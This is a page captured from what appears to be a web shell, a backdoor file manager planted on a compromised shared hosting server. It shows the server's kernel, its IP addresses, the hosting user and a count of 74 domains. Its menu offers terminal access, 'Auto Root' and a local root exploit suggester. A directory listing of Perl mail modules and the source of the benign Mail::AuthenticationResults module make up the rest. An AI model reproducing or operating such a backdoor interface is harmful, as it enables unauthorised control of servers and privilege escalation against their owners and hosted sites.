Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
perl5 /
vendor_perl /
Mail /
Delete
Unzip
Name
Size
Permission
Date
Action
AuthenticationResults
[ DIR ]
drwxr-xr-x
2025-02-25 04:07
DKIM
[ DIR ]
drwxr-xr-x
2025-02-25 04:07
Field
[ DIR ]
drwxr-xr-x
2025-02-25 04:07
Mailer
[ DIR ]
drwxr-xr-x
2025-02-25 04:07
SPF
[ DIR ]
drwxr-xr-x
2025-02-25 04:07
SpamAssassin
[ DIR ]
drwxr-xr-x
2025-02-25 04:07
Address.pm
6.84
KB
-rw-r--r--
2019-05-21 14:26
Address.pod
4.07
KB
-rw-r--r--
2019-05-21 14:26
AuthenticationResults.pm
1.67
KB
-rw-r--r--
2021-01-12 22:10
Cap.pm
6.42
KB
-rw-r--r--
2019-05-21 14:26
Cap.pod
3.78
KB
-rw-r--r--
2019-05-21 14:26
DKIM.pm
3.83
KB
-rw-r--r--
2020-09-07 05:49
Field.pm
4.94
KB
-rw-r--r--
2019-05-21 14:26
Field.pod
4.91
KB
-rw-r--r--
2019-05-21 14:26
Filter.pm
1.44
KB
-rw-r--r--
2019-05-21 14:26
Filter.pod
2.82
KB
-rw-r--r--
2019-05-21 14:26
Header.pm
13.82
KB
-rw-r--r--
2019-05-21 14:26
Header.pod
7.76
KB
-rw-r--r--
2019-05-21 14:26
Internet.pm
11.98
KB
-rw-r--r--
2019-05-21 14:26
Internet.pod
10.24
KB
-rw-r--r--
2019-05-21 14:26
Mailer.pm
4.94
KB
-rw-r--r--
2019-05-21 14:26
Mailer.pod
4.1
KB
-rw-r--r--
2019-05-21 14:26
SPF.pm
2.31
KB
-rw-r--r--
2022-02-16 08:24
Send.pm
1.35
KB
-rw-r--r--
2019-05-21 14:26
Send.pod
3.17
KB
-rw-r--r--
2019-05-21 14:26
SpamAssassin.pm
69.57
KB
-r--r--r--
2021-04-09 08:28
Util.pm
3.36
KB
-rw-r--r--
2019-05-21 14:26
Util.pod
3.09
KB
-rw-r--r--
2019-05-21 14:26
Save
Rename
package Mail::AuthenticationResults; # ABSTRACT: Object Oriented Authentication-Results Headers require 5.008; use strict; use warnings; our $VERSION = '2.20210112'; # VERSION use Carp; use Mail::AuthenticationResults::Parser; sub new { my ( $class ) = @_; my $self = {}; bless $self, $class; return $self; } sub parser { my ( $self, $auth_headers ) = @_; return Mail::AuthenticationResults::Parser->new( $auth_headers ); } 1; __END__ =pod =encoding UTF-8 =head1 NAME Mail::AuthenticationResults - Object Oriented Authentication-Results Headers =head1 VERSION version 2.20210112 =head1 DESCRIPTION Object Oriented Authentication-Results email headers. This parser copes with most styles of Authentication-Results header seen in the wild, but is not yet fully RFC7601 compliant Differences from RFC7601 key/value pairs are parsed when present in the authserv-id section, this is against RFC but has been seen in headers added by Yahoo!. Comments added between key/value pairs will be added after them in the data structures and when stringified. It is a work in progress.. =head1 METHODS =head2 new() Return a new Mail::AuthenticationResults object =head2 parser() Returns a new Mail::AuthenticationResults::Parser object for the supplied $auth_results header =head1 BUGS Please report bugs via the github tracker. https://github.com/marcbradshaw/Mail-AuthenticationResults/issues =head1 AUTHOR Marc Bradshaw <marc@marcbradshaw.net> =head1 COPYRIGHT AND LICENSE This software is copyright (c) 2020 by Marc Bradshaw. This is free software; you can redistribute it and/or modify it under the same terms as the Perl 5 programming language system itself. =cut